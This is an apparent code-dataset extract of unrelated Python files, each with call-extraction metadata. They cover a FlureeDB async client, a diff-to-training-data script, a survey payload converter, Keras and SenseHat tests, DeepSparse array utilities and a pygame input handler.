return _FlureeQlSubQuery(self, method)
async def query(self):
"""Do the actual multi-query
Returns
-------
dict
The result from the mult-query
"""
return_body = await self.stringendpoint.header_signed(self.multi_query)
return json.loads(return_body)
class FlureeQlEndpoint:
"""Endpoint for JSON based (FlureeQl) queries"""
def __init__(self, api_endpoint, client, ssl_verify_disabled):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
if api_endpoint == "flureeql":
api_endpoint = "query"
self.api_endpoint = api_endpoint
self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return ["query", "actual_query", "__dir__", "__init__"]
def __getattr__(self, method):
"""query
Parameters
----------
method : string
should be 'query'
Returns
-------
_FlureeQlQuery
Helper class for creating FlureeQl queries.
Raises
------
AttributeError
When anything other than 'query' is provided as method.
"""
if method != 'query':
raise AttributeError("FlureeQlEndpoint has no attribute named " + method)
return _FlureeQlQuery(self)
async def actual_query(self, query_object):
"""Execure a query with a python dict that should get JSON serialized and convert JSON
response back into a python object
Parameters
----------
query_object : dict
JSON serializable query
Returns
-------
dict
JSON decoded query response
"""
return_body = await self.stringendpoint.header_signed(query_object)
return json.loads(return_body)
class CommandEndpoint:
"""Endpoint for FlureeQL command"""
def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
self.client = client
self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
async def transaction(self, transaction_obj, deps=None, do_await=True):
"""Transact with list of python dicts that should get serialized to JSON,
returns a transaction handle for polling FlureeDB if needed.
Parameters
----------
transaction_obj : list
Transaction list
deps: dict
FlureeDb debs
do_await: bool
Do we wait for the transaction to complete, or do we fire and forget?
Returns
-------
string
transactio ID of pending transaction
Raises
------
FlureeTransactionFailure
When transaction fails
"""
tid = await self.stringendpoint.body_signed(transaction_obj, deps)
tid = tid[1:-1]
if not do_await:
return tid
while True:
status = await self.client.query.query(select=["*"], ffrom=["_tx/id", tid])
if status:
if "error" in status[0]:
raise FlureeTransactionFailure("Transaction failed:" + status[0]["error"])
if "_tx/error" in status[0]:
raise FlureeTransactionFailure("Transaction failed:" + status[0]["_tx/error"])
return status[0]
await asyncio.sleep(0.1)
class LedgerStatsEndpoint:
"""Endpoint for ledger_stats"""
def __init__(self, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
self.stringendpoint = _StringEndpoint('ledger_stats', client, ssl_verify_disabled)
async def __call__(self):
"""Send request to ledger-stats endpoint and retrieve result
Returns
-------
dict
json decode result from the server.
"""
return_body = await self.stringendpoint.empty_post_unsigned()
return json.loads(return_body)
if api_endpoint not in self.known_endpoints:
raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
if api_endpoint not in self.implemented:
raise NotImplementedError("No implementation yet for " + api_endpoint)
if api_endpoint in ["command"]:
if self.signer is None:
raise FlureeKeyRequired("Command endpoint not supported in open-API mode. privkey required!")
return CommandEndpoint(api_endpoint, self, self.ssl_verify_disabled)
if api_endpoint in ["multi_query"]:
return FlureeQlEndpointMulti(self, self.ssl_verify_disabled)
if api_endpoint == 'ledger_stats':
return LedgerStatsEndpoint(self, self.ssl_verify_disabled)
return FlureeQlEndpoint(api_endpoint, self, self.ssl_verify_disabled)
|
[
"json.loads",
"asyncio.sleep",
"json.dumps",
"time.time",
"aiohttp.ClientSession",
"aioflureedb.signing.DbSigner"
] |
[((12320, 12364), 'json.dumps', 'json.dumps', (['kwdict'], {'indent': '(4)', 'sort_keys': '(True)'}), '(kwdict, indent=4, sort_keys=True)\n', (12330, 12364), False, 'import json\n'), ((18508, 18531), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (18529, 18531), False, 'import aiohttp\n'), ((26528, 26551), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (26549, 26551), False, 'import aiohttp\n'), ((18202, 18265), 'aioflureedb.signing.DbSigner', 'DbSigner', (['masterkey', 'auth_address', 'None', 'sig_validity', 'sig_fuel'], {}), '(masterkey, auth_address, None, sig_validity, sig_fuel)\n', (18210, 18265), False, 'from aioflureedb.signing import DbSigner\n'), ((26411, 26476), 'aioflureedb.signing.DbSigner', 'DbSigner', (['privkey', 'auth_address', 'database', 'sig_validity', 'sig_fuel'], {}), '(privkey, auth_address, database, sig_validity, sig_fuel)\n', (26419, 26476), False, 'from aioflureedb.signing import DbSigner\n'), ((7786, 7806), 'json.loads', 'json.loads', (['response'], {}), '(response)\n', (7796, 7806), False, 'import json\n'), ((8061, 8081), 'json.loads', 'json.loads', (['response'], {}), '(response)\n', (8071, 8081), False, 'import json\n'), ((8599, 8617), 'asyncio.sleep', 'asyncio.sleep', (['(0.5)'], {}), '(0.5)\n', (8612, 8617), False, 'import asyncio\n'), ((59287, 59332), 'json.dumps', 'json.dumps', (['command'], {'indent': '(4)', 'sort_keys': '(True)'}), '(command, indent=4, sort_keys=True)\n', (59297, 59332), False, 'import json\n'), ((62068, 62091), 'json.loads', 'json.loads', (['return_body'], {}), '(return_body)\n', (62078, 62091), False, 'import json\n'), ((64478, 64501), 'json.loads', 'json.loads', (['return_body'], {}), '(return_body)\n', (64488, 64501), False, 'import json\n'), ((67689, 67712), 'json.loads', 'json.loads', (['return_body'], {}), '(return_body)\n', (67699, 67712), False, 'import json\n'), ((10744, 10760), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (10754, 10760), False, 'import json\n'), ((11150, 11166), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (11160, 11166), False, 'import json\n'), ((13081, 13099), 'asyncio.sleep', 'asyncio.sleep', (['(0.1)'], {}), '(0.1)\n', (13094, 13099), False, 'import asyncio\n'), ((38608, 38628), 'json.loads', 'json.loads', (['flake[2]'], {}), '(flake[2])\n', (38618, 38628), False, 'import json\n'), ((51497, 51513), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (51510, 51513), False, 'import asyncio\n'), ((58514, 58562), 'json.dumps', 'json.dumps', (['query_body'], {'indent': '(4)', 'sort_keys': '(True)'}), '(query_body, indent=4, sort_keys=True)\n', (58524, 58562), False, 'import json\n'), ((38888, 38908), 'json.loads', 'json.loads', (['flake[2]'], {}), '(flake[2])\n', (38898, 38908), False, 'import json\n'), ((51705, 51716), 'time.time', 'time.time', ([], {}), '()\n', (51714, 51716), False, 'import time\n'), ((53801, 53819), 'asyncio.sleep', 'asyncio.sleep', (['(0.1)'], {}), '(0.1)\n', (53814, 53819), False, 'import asyncio\n'), ((66761, 66779), 'asyncio.sleep', 'asyncio.sleep', (['(0.1)'], {}), '(0.1)\n', (66774, 66779), False, 'import asyncio\n'), ((51637, 51648), 'time.time', 'time.time', ([], {}), '()\n', (51646, 51648), False, 'import time\n')]
|
import json
import os
import sys
from collections import Counter
from pathlib import Path
TRAIN_DIR = Path('data/train')
def count_popular_languages():
language_counts = Counter()
for line in sys.stdin:
data = json.loads(line)
for _, path_after in data['paths']:
extension = path_after.rsplit('.', 1)[-1]
language_counts[extension] += 1
for language, counts in language_counts.most_common():
print(language, counts)
def main():
extension_mapping = {
'c': 'c',
'h': 'c',
'cc': 'cpp',
'cpp': 'cpp',
'cs': 'cs',
'css': 'css',
'go': 'go',
'hs': 'hs',
'html': 'html',
'java': 'java',
'js': 'js',
'm': 'm',
'php': 'php',
'py': 'py',
'rb': 'rb',
'rs': 'rs',
'scala': 'scala',
'sh': 'sh',
'swift': 'swift',
'ts': 'ts',
'xml': 'xml',
}
lang_id_to_file = {}
for line in sys.stdin:
data = json.loads(line)
for (_, diff_after), (_, path_after) in zip(data['diffs'], data['paths']):
if len(diff_after.strip()) < 5 or len(diff_after) > 256:
continue
extension = path_after.rsplit('.', 1)[-1]
lang_id = extension_mapping.get(extension)
if lang_id is None:
continue
# Create 'data/train/p-{lang_id}' directory if not exists
if not os.path.exists(TRAIN_DIR / f'p-{lang_id}'):
os.makedirs(TRAIN_DIR / f'p-{lang_id}')
if lang_id in lang_id_to_file:
f = lang_id_to_file[lang_id]
else:
f = open(TRAIN_DIR / f'p-{lang_id}' / 'github.txt', mode='w')
lang_id_to_file[lang_id] = f
f.write(diff_after)
f.write('\n')
for f in lang_id_to_file.values():
f.close()
if __name__ == '__main__':
main()
|
[
"os.makedirs",
"json.loads",
"os.path.exists",
"pathlib.Path",
"collections.Counter"
] |
[((103, 121), 'pathlib.Path', 'Path', (['"""data/train"""'], {}), "('data/train')\n", (107, 121), False, 'from pathlib import Path\n'), ((177, 186), 'collections.Counter', 'Counter', ([], {}), '()\n', (184, 186), False, 'from collections import Counter\n'), ((230, 246), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (240, 246), False, 'import json\n'), ((1039, 1055), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (1049, 1055), False, 'import json\n'), ((1490, 1532), 'os.path.exists', 'os.path.exists', (["(TRAIN_DIR / f'p-{lang_id}')"], {}), "(TRAIN_DIR / f'p-{lang_id}')\n", (1504, 1532), False, 'import os\n'), ((1550, 1589), 'os.makedirs', 'os.makedirs', (["(TRAIN_DIR / f'p-{lang_id}')"], {}), "(TRAIN_DIR / f'p-{lang_id}')\n", (1561, 1589), False, 'import os\n')]
|
from typing import Mapping
from structlog import get_logger
from app.questionnaire.questionnaire_schema import DEFAULT_LANGUAGE_CODE
from app.submitter.convert_payload_0_0_1 import convert_answers_to_payload_0_0_1
from app.submitter.convert_payload_0_0_3 import convert_answers_to_payload_0_0_3
logger = get_logger()
class DataVersionError(Exception):
def __init__(self, version):
super().__init__()
self.version = version
def __str__(self):
return f"Data version {self.version} not supported"
def convert_answers(
schema, questionnaire_store, routing_path, submitted_at, flushed=False
):
"""
Create the JSON answer format for down stream processing in the following format:
```
{
'tx_id': '0f534ffc-9442-414c-b39f-a756b4adc6cb',
'type' : 'uk.gov.ons.edc.eq:surveyresponse',
'version' : '0.0.1',
'origin' : 'uk.gov.ons.edc.eq',
'survey_id': '021',
'flushed': true|false
'collection':{
'exercise_sid': 'hfjdskf',
'schema_name': 'yui789',
'period': '2016-02-01'
},
'started_at': '2016-03-06T15:28:05Z',
'submitted_at': '2016-03-07T15:28:05Z',
'launch_language_code': 'en',
'channel': 'RH',
'metadata': {
'user_id': '789473423',
'ru_ref': '432423423423'
},
'data': [
...
],
}
```
Args:
schema: QuestionnaireSchema instance with populated schema json
questionnaire_store: EncryptedQuestionnaireStorage instance for accessing current questionnaire data
routing_path: The full routing path followed by the user when answering the questionnaire
submitted_at: The date and time of submission
flushed: True when system submits the users answers, False when submitted by user.
Returns:
Data payload
"""
metadata = questionnaire_store.metadata
response_metadata = questionnaire_store.response_metadata
answer_store = questionnaire_store.answer_store
list_store = questionnaire_store.list_store
survey_id = schema.json["survey_id"]
payload = {
"case_id": metadata["case_id"],
"tx_id": metadata["tx_id"],
"type": "uk.gov.ons.edc.eq:surveyresponse",
"version": schema.json["data_version"],
"origin": "uk.gov.ons.edc.eq",
"survey_id": survey_id,
"flushed": flushed,
"submitted_at": submitted_at.isoformat(),
"collection": build_collection(metadata),
"metadata": build_metadata(metadata),
"launch_language_code": metadata.get("language_code", DEFAULT_LANGUAGE_CODE),
}
optional_properties = get_optional_payload_properties(metadata, response_metadata)
if schema.json["data_version"] == "0.0.3":
payload["data"] = {
"answers": convert_answers_to_payload_0_0_3(
answer_store, list_store, schema, routing_path
),
"lists": list_store.serialize(),
}
elif schema.json["data_version"] == "0.0.1":
payload["data"] = convert_answers_to_payload_0_0_1(
metadata, answer_store, list_store, schema, routing_path
)
else:
raise DataVersionError(schema.json["data_version"])
logger.info("converted answer ready for submission")
return payload | optional_properties
def build_collection(metadata) -> Mapping[str, str]:
return {
"exercise_sid": metadata["collection_exercise_sid"],
"schema_name": metadata["schema_name"],
"period": metadata["period_id"],
}
def build_metadata(metadata) -> Mapping[str, str]:
downstream_metadata = {"user_id": metadata["user_id"], "ru_ref": metadata["ru_ref"]}
if metadata.get("ref_p_start_date"):
downstream_metadata["ref_period_start_date"] = metadata["ref_p_start_date"]
if metadata.get("ref_p_end_date"):
downstream_metadata["ref_period_end_date"] = metadata["ref_p_end_date"]
if metadata.get("display_address"):
downstream_metadata["display_address"] = metadata["display_address"]
return downstream_metadata
def get_optional_payload_properties(metadata, response_metadata) -> Mapping[str, str]:
payload = {}
for key in ["channel", "case_type", "form_type", "region_code", "case_ref"]:
if value := metadata.get(key):
payload[key] = value
if started_at := response_metadata.get("started_at"):
payload["started_at"] = started_at
return payload
|
[
"app.submitter.convert_payload_0_0_1.convert_answers_to_payload_0_0_1",
"app.submitter.convert_payload_0_0_3.convert_answers_to_payload_0_0_3",
"structlog.get_logger"
] |
[((307, 319), 'structlog.get_logger', 'get_logger', ([], {}), '()\n', (317, 319), False, 'from structlog import get_logger\n'), ((2881, 2966), 'app.submitter.convert_payload_0_0_3.convert_answers_to_payload_0_0_3', 'convert_answers_to_payload_0_0_3', (['answer_store', 'list_store', 'schema', 'routing_path'], {}), '(answer_store, list_store, schema, routing_path\n )\n', (2913, 2966), False, 'from app.submitter.convert_payload_0_0_3 import convert_answers_to_payload_0_0_3\n'), ((3123, 3217), 'app.submitter.convert_payload_0_0_1.convert_answers_to_payload_0_0_1', 'convert_answers_to_payload_0_0_1', (['metadata', 'answer_store', 'list_store', 'schema', 'routing_path'], {}), '(metadata, answer_store, list_store, schema,\n routing_path)\n', (3155, 3217), False, 'from app.submitter.convert_payload_0_0_1 import convert_answers_to_payload_0_0_1\n')]
|
import os
from typing import List
from trescope import Trescope
from trescope.config import ImageConfig
from trescope.controller import EnumControl
from trescope.toolbox import simpleDisplayOutputs
import pandas as pd
def clearTrescope():
for i in range(4): Trescope().selectOutput(i).clear()
def add_control():
path = '../data/res/model_images'
model_images: List[str] = os.listdir(path)
Trescope().initialize(True, simpleDisplayOutputs(1, 4))
df = pd.DataFrame({'file': [], 'shape': [], 'thickness': []})
batch_size = 2
for batch_index in range(len(model_images) // batch_size):
clearTrescope()
for sample_index in range(batch_size):
model_image_path = model_images[batch_index * batch_size + sample_index]
Trescope().selectOutput(sample_index * 2).plotImage(os.path.join(path, model_image_path)).withConfig(ImageConfig())
(Trescope().selectOutput(sample_index * 2 + 1).asInput()
.addControl(EnumControl().id('file').label('File').enumeration(model_image_path).defaultValue(model_image_path))
.addControl(EnumControl().id('shape').label('Circle or Square').enumeration('circle', 'square').defaultValue('circle'))
.addControl(EnumControl().id('thickness').label('Size').enumeration('xs', 's', 'm', 'l', 'xl').defaultValue('m')))
label_data = Trescope().breakPoint(f'batch_index:{batch_index}')
for row in label_data.values(): df = df.append({'file': row['file'], 'shape': row['shape'], 'thickness': row['thickness']}, ignore_index=True)
print(df)
if __name__ == '__main__':
add_control()
|
[
"pandas.DataFrame",
"trescope.Trescope",
"trescope.config.ImageConfig",
"trescope.toolbox.simpleDisplayOutputs",
"os.path.join",
"os.listdir",
"trescope.controller.EnumControl"
] |
[((389, 405), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (399, 405), False, 'import os\n'), ((477, 533), 'pandas.DataFrame', 'pd.DataFrame', (["{'file': [], 'shape': [], 'thickness': []}"], {}), "({'file': [], 'shape': [], 'thickness': []})\n", (489, 533), True, 'import pandas as pd\n'), ((439, 465), 'trescope.toolbox.simpleDisplayOutputs', 'simpleDisplayOutputs', (['(1)', '(4)'], {}), '(1, 4)\n', (459, 465), False, 'from trescope.toolbox import simpleDisplayOutputs\n'), ((411, 421), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (419, 421), False, 'from trescope import Trescope\n'), ((885, 898), 'trescope.config.ImageConfig', 'ImageConfig', ([], {}), '()\n', (896, 898), False, 'from trescope.config import ImageConfig\n'), ((1377, 1387), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (1385, 1387), False, 'from trescope import Trescope\n'), ((265, 275), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (273, 275), False, 'from trescope import Trescope\n'), ((836, 872), 'os.path.join', 'os.path.join', (['path', 'model_image_path'], {}), '(path, model_image_path)\n', (848, 872), False, 'import os\n'), ((784, 794), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (792, 794), False, 'from trescope import Trescope\n'), ((1253, 1266), 'trescope.controller.EnumControl', 'EnumControl', ([], {}), '()\n', (1264, 1266), False, 'from trescope.controller import EnumControl\n'), ((913, 923), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (921, 923), False, 'from trescope import Trescope\n'), ((1120, 1133), 'trescope.controller.EnumControl', 'EnumControl', ([], {}), '()\n', (1131, 1133), False, 'from trescope.controller import EnumControl\n'), ((994, 1007), 'trescope.controller.EnumControl', 'EnumControl', ([], {}), '()\n', (1005, 1007), False, 'from trescope.controller import EnumControl\n')]
|
import pytest
import numpy as np
from numpy.testing import assert_allclose
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Flatten
from keras.layers.embeddings import Embedding
from keras.constraints import unitnorm
from keras import backend as K
X1 = np.array([[1], [2]], dtype='int32')
W1 = np.array([[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]], dtype='float32')
def test_unitnorm_constraint():
lookup = Sequential()
lookup.add(Embedding(3, 2, weights=[W1],
W_constraint=unitnorm(),
input_length=1))
lookup.add(Flatten())
lookup.add(Dense(1))
lookup.add(Activation('sigmoid'))
lookup.compile(loss='binary_crossentropy', optimizer='sgd',
class_mode='binary')
lookup.train_on_batch(X1, np.array([[1], [0]], dtype='int32'))
norm = np.linalg.norm(K.get_value(lookup.trainable_weights[0]), axis=0)
assert_allclose(norm, np.ones_like(norm).astype('float32'), rtol=1e-05)
if __name__ == '__main__':
pytest.main([__file__])
|
[
"keras.layers.core.Dense",
"numpy.ones_like",
"keras.layers.core.Activation",
"pytest.main",
"keras.backend.get_value",
"keras.constraints.unitnorm",
"numpy.array",
"keras.layers.core.Flatten",
"keras.models.Sequential"
] |
[((291, 326), 'numpy.array', 'np.array', (['[[1], [2]]'], {'dtype': '"""int32"""'}), "([[1], [2]], dtype='int32')\n", (299, 326), True, 'import numpy as np\n'), ((332, 395), 'numpy.array', 'np.array', (['[[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]]'], {'dtype': '"""float32"""'}), "([[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]], dtype='float32')\n", (340, 395), True, 'import numpy as np\n'), ((443, 455), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (453, 455), False, 'from keras.models import Sequential\n'), ((1038, 1061), 'pytest.main', 'pytest.main', (['[__file__]'], {}), '([__file__])\n', (1049, 1061), False, 'import pytest\n'), ((608, 617), 'keras.layers.core.Flatten', 'Flatten', ([], {}), '()\n', (615, 617), False, 'from keras.layers.core import Dense, Activation, Flatten\n'), ((634, 642), 'keras.layers.core.Dense', 'Dense', (['(1)'], {}), '(1)\n', (639, 642), False, 'from keras.layers.core import Dense, Activation, Flatten\n'), ((659, 680), 'keras.layers.core.Activation', 'Activation', (['"""sigmoid"""'], {}), "('sigmoid')\n", (669, 680), False, 'from keras.layers.core import Dense, Activation, Flatten\n'), ((816, 851), 'numpy.array', 'np.array', (['[[1], [0]]'], {'dtype': '"""int32"""'}), "([[1], [0]], dtype='int32')\n", (824, 851), True, 'import numpy as np\n'), ((879, 919), 'keras.backend.get_value', 'K.get_value', (['lookup.trainable_weights[0]'], {}), '(lookup.trainable_weights[0])\n', (890, 919), True, 'from keras import backend as K\n'), ((539, 549), 'keras.constraints.unitnorm', 'unitnorm', ([], {}), '()\n', (547, 549), False, 'from keras.constraints import unitnorm\n'), ((955, 973), 'numpy.ones_like', 'np.ones_like', (['norm'], {}), '(norm)\n', (967, 973), True, 'import numpy as np\n')]
|
import time
import pytest
from libs.sensorMod.src.sensor_SenseHat import Sensor
# =========================================================
# G L O B A L S & P Y T E S T F I X T U R E S
# =========================================================
@pytest.fixture()
def valid_attribs():
return {
'repeat': 1, # Number of times to run speed test
'holdTime': 60, # Amount of time between tests
'location': '- n/a -',
'locationTZ': 'Etc/UTC',
'tempUnit': 'C', # Temp display unit: 'C' (Celsius), 'F' (Fahrenheit), 'K' (Kelvin)
'enviro': True, # Get environmental data (i.e. temperature, humidity, and pressure)
'IMU': True, # Get IMU (inertial measurement unit) data
}
def _init_sensor(mocker, attribs):
sensor = Sensor(attribs)
mocker.patch.object(sensor._sensehat, 'get_temperature')
mocker.patch.object(sensor._sensehat, 'get_temperature_from_humidity')
mocker.patch.object(sensor._sensehat, 'get_humidity')
mocker.patch.object(sensor._sensehat, 'get_pressure')
mocker.patch.object(sensor._sensehat, 'get_orientation')
mocker.patch.object(sensor._sensehat, 'get_compass_raw')
mocker.patch.object(sensor._sensehat, 'get_accelerometer_raw')
mocker.patch.object(sensor._sensehat, 'get_gyroscope_raw')
mocker.patch.object(time, 'sleep')
return sensor
# =========================================================
# T E S T F U N C T I O N S
# =========================================================
@pytest.mark.smoke
def test_get_data(mocker, valid_attribs):
attribs = valid_attribs
sensor = _init_sensor(mocker, attribs)
sensor.get_data()
sensor._sensehat.get_temperature.assert_called_once()
sensor._sensehat.get_temperature_from_humidity.assert_called_once()
sensor._sensehat.get_humidity.assert_called_once()
sensor._sensehat.get_pressure.assert_called_once()
sensor._sensehat.get_orientation.assert_called_once()
sensor._sensehat.get_compass_raw.assert_called_once()
sensor._sensehat.get_accelerometer_raw.assert_called_once()
sensor._sensehat.get_gyroscope_raw.assert_called_once()
|
[
"pytest.fixture",
"libs.sensorMod.src.sensor_SenseHat.Sensor"
] |
[((260, 276), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (274, 276), False, 'import pytest\n'), ((806, 821), 'libs.sensorMod.src.sensor_SenseHat.Sensor', 'Sensor', (['attribs'], {}), '(attribs)\n', (812, 821), False, 'from libs.sensorMod.src.sensor_SenseHat import Sensor\n')]
|
"""
https://leetcode.com/problems/jewels-and-stones/
https://leetcode.com/submissions/detail/138688434/
"""
class Solution:
def numJewelsInStones(self, J, S):
"""
:type J: str
:type S: str
:rtype: int
"""
result = 0
for stone in J:
result += S.count(stone)
return result
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.numJewelsInStones('aA', 'aAAbbbb'), 3)
self.assertEqual(solution.numJewelsInStones('z', 'ZZ'), 0)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((628, 643), 'unittest.main', 'unittest.main', ([], {}), '()\n', (641, 643), False, 'import unittest\n')]
|
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import List
import numpy
from deepsparse.utils.log import log_init
__all__ = [
"arrays_to_bytes",
"bytes_to_arrays",
"verify_outputs",
]
log = log_init(os.path.basename(__file__))
def arrays_to_bytes(arrays: List[numpy.array]) -> bytearray:
"""
:param arrays: List of numpy arrays to serialize as bytes
:return: bytearray representation of list of numpy arrays
"""
to_return = bytearray()
for arr in arrays:
arr_dtype = bytearray(str(arr.dtype), "utf-8")
arr_shape = bytearray(",".join([str(a) for a in arr.shape]), "utf-8")
sep = bytearray("|", "utf-8")
arr_bytes = arr.ravel().tobytes()
to_return += arr_dtype + sep + arr_shape + sep + arr_bytes
return to_return
def bytes_to_arrays(serialized_arr: bytearray) -> List[numpy.array]:
"""
:param serialized_arr: bytearray representation of list of numpy arrays
:return: List of numpy arrays decoded from input
"""
sep = "|".encode("utf-8")
arrays = []
i_start = 0
while i_start < len(serialized_arr) - 1:
i_0 = serialized_arr.find(sep, i_start)
i_1 = serialized_arr.find(sep, i_0 + 1)
arr_dtype = numpy.dtype(serialized_arr[i_start:i_0].decode("utf-8"))
arr_shape = tuple(
[int(a) for a in serialized_arr[i_0 + 1 : i_1].decode("utf-8").split(",")]
)
arr_num_bytes = numpy.prod(arr_shape) * arr_dtype.itemsize
arr_str = serialized_arr[i_1 + 1 : arr_num_bytes + (i_1 + 1)]
arr = numpy.frombuffer(arr_str, dtype=arr_dtype).reshape(arr_shape)
arrays.append(arr.copy())
i_start = i_1 + arr_num_bytes + 1
return arrays
def verify_outputs(
outputs: List[numpy.array],
gt_outputs: List[numpy.array],
atol: float = 8.0e-4,
rtol: float = 0.0,
) -> List[float]:
"""
Compares two lists of output tensors, checking that they are sufficiently similar
:param outputs: List of numpy arrays, usually model outputs
:param gt_outputs: List of numpy arrays, usually reference outputs
:param atol: Absolute tolerance for allclose
:param rtol: Relative tolerance for allclose
:return: The list of max differences for each pair of outputs
"""
max_diffs = []
if len(outputs) != len(gt_outputs):
raise Exception(
f"number of outputs doesn't match, {len(outputs)} != {len(gt_outputs)}"
)
for i in range(len(gt_outputs)):
gt_output = gt_outputs[i]
output = outputs[i]
if output.shape != gt_output.shape:
raise Exception(
f"output shapes don't match, {output.shape} != {gt_output.shape}"
)
if type(output) != type(gt_output):
raise Exception(
f"output types don't match, {type(output)} != {type(gt_output)}"
)
max_diff = numpy.max(numpy.abs(output - gt_output))
max_diffs.append(max_diff)
log.info(f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}")
if not numpy.allclose(output, gt_output, rtol=rtol, atol=atol):
raise Exception(
"output data doesn't match\n"
f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}\n"
f" mean = {numpy.mean(output):.5f} {numpy.mean(gt_output):.5f}\n"
f" std = {numpy.std(output):.5f} {numpy.std(gt_output):.5f}\n"
f" max = {numpy.max(output):.5f} {numpy.max(gt_output):.5f}\n"
f" min = {numpy.min(output):.5f} {numpy.min(gt_output):.5f}"
)
return max_diffs
|
[
"numpy.abs",
"os.path.basename",
"numpy.std",
"numpy.frombuffer",
"numpy.allclose",
"numpy.max",
"numpy.mean",
"numpy.min",
"numpy.prod"
] |
[((809, 835), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (825, 835), False, 'import os\n'), ((2036, 2057), 'numpy.prod', 'numpy.prod', (['arr_shape'], {}), '(arr_shape)\n', (2046, 2057), False, 'import numpy\n'), ((3524, 3553), 'numpy.abs', 'numpy.abs', (['(output - gt_output)'], {}), '(output - gt_output)\n', (3533, 3553), False, 'import numpy\n'), ((3693, 3748), 'numpy.allclose', 'numpy.allclose', (['output', 'gt_output'], {'rtol': 'rtol', 'atol': 'atol'}), '(output, gt_output, rtol=rtol, atol=atol)\n', (3707, 3748), False, 'import numpy\n'), ((2163, 2205), 'numpy.frombuffer', 'numpy.frombuffer', (['arr_str'], {'dtype': 'arr_dtype'}), '(arr_str, dtype=arr_dtype)\n', (2179, 2205), False, 'import numpy\n'), ((3942, 3960), 'numpy.mean', 'numpy.mean', (['output'], {}), '(output)\n', (3952, 3960), False, 'import numpy\n'), ((3967, 3988), 'numpy.mean', 'numpy.mean', (['gt_output'], {}), '(gt_output)\n', (3977, 3988), False, 'import numpy\n'), ((4027, 4044), 'numpy.std', 'numpy.std', (['output'], {}), '(output)\n', (4036, 4044), False, 'import numpy\n'), ((4051, 4071), 'numpy.std', 'numpy.std', (['gt_output'], {}), '(gt_output)\n', (4060, 4071), False, 'import numpy\n'), ((4110, 4127), 'numpy.max', 'numpy.max', (['output'], {}), '(output)\n', (4119, 4127), False, 'import numpy\n'), ((4134, 4154), 'numpy.max', 'numpy.max', (['gt_output'], {}), '(gt_output)\n', (4143, 4154), False, 'import numpy\n'), ((4193, 4210), 'numpy.min', 'numpy.min', (['output'], {}), '(output)\n', (4202, 4210), False, 'import numpy\n'), ((4217, 4237), 'numpy.min', 'numpy.min', (['gt_output'], {}), '(gt_output)\n', (4226, 4237), False, 'import numpy\n')]
|
import sys
import pygame as pg
from ui.input import control
def check_keyboard_events(window, state):
def close():
pg.quit()
sys.exit()
events = pg.event.get()
for event in events:
if event.type == pg.QUIT:
close()
elif event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE:
close()
elif event.type == pg.KEYDOWN and event.key == pg.K_RETURN:
control.central_button(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_UP:
control.scroll_menu_up(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_DOWN:
control.scroll_menu_down(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_q:
control.back(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_w:
control.switch_audio(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_e:
control.switch_led(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_r:
control.open_setting(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_1:
control.play_favourite(window, state, 1)
elif event.type == pg.KEYDOWN and event.key == pg.K_2:
control.play_favourite(window, state, 2)
elif event.type == pg.KEYDOWN and event.key == pg.K_3:
control.play_favourite(window, state, 3)
elif event.type == pg.KEYDOWN and event.key == pg.K_4:
control.play_favourite(window, state, 4)
elif event.type == pg.KEYDOWN and event.key == pg.K_5:
control.play_favourite(window, state, 5)
elif event.type == pg.KEYDOWN and event.key == pg.K_6:
control.play_favourite(window, state, 6)
elif event.type == pg.KEYDOWN and event.key == pg.K_7:
control.play_favourite(window, state, 7)
return events
|
[
"pygame.quit",
"ui.input.control.switch_audio",
